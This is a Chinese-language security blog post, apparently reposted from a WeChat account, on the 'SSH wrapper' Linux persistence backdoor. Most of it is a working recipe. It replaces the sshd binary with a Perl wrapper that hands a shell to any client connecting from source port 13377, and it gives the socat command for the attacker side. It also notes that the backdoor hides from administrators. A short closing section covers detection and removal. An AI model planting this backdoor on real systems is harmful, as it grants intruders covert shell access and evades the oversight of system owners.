Linux持久化—ssh_wrapper

admin 2023年12月9日13:38:03评论32 views字数 1233阅读4分6秒阅读模式

实现原理

SSH Wrapper 后门是一种通过篡改 SSH 程序的方式来实现的恶意访问。它的原理涉及到对 SSH 可执行文件的修改,使其在执行正常的 SSH 连接时,同时执行额外的恶意操作。

首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候,正则匹配会失败,于是执行下一句,启动/usr/bin/sshd,这是原始sshd。原始的sshd监听端口建立了tcp连接后,会fork一个子进程处理具体工作。这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到脚本了。此时子进程标准输入输出已被重定向到套接字,getpeername能真的获取到客户端的TCP源端口,如果是13377就执行sh给个shell。

简单点就是从sshd fork出一个子进程,输入输出重定向到套接字,并对连过来的客户端端口进行了判断。

优点:

  1. 隐蔽性较强,无需要编译,使用于大部分环境中
  2. 在无连接后门的情况下,管理员是看不到端口和进程的,last也查不到登陆

缺点:

需要重启sshd进程

操作步骤

被攻击端

cd /usr/sbin/
mv sshd ../bin/    #对sshd程序做备份
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/ssh restart 或者 systemctl restart sshd

Linux持久化—ssh_wrapper

攻击端

socat STDIO TCP4:192.168.52.132:22,sourceport=13377

Linux持久化—ssh_wrapper

修改源端口,可以用python的struct标准库实现

其中 4A是13377的小端模式,如果你想修改源端口,可以用python的struct标准库实现

Python 2.7.12 (default, Oct  5 2020, 13:56:01)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import struct
>>> print repr(struct.pack('>I6',19526))
'x00x00LF'
>>> print repr(struct.pack('>I6',13377))
'x00x004A'

如何排查

1、查看连接

Linux持久化—ssh_wrapper

2、查看sshd进程

  • ps -ef | grep -v grep | grep sshd:筛选出命令名包含 sshd 的进程信息,但是排除 grep sshd 命令本身的进程信息。

Linux持久化—ssh_wrapper

3、删除后门

rm -rf /usr/sbin/sshd; mv /usr/bin/sshd ../sbin;

原文始发于微信公众号(贝雷帽SEC):Linux持久化—ssh_wrapper

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月9日13:38:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Linux持久化—ssh_wrapperhttp://cn-sec.com/archives/2282435.html

发表评论

匿名网友 填写信息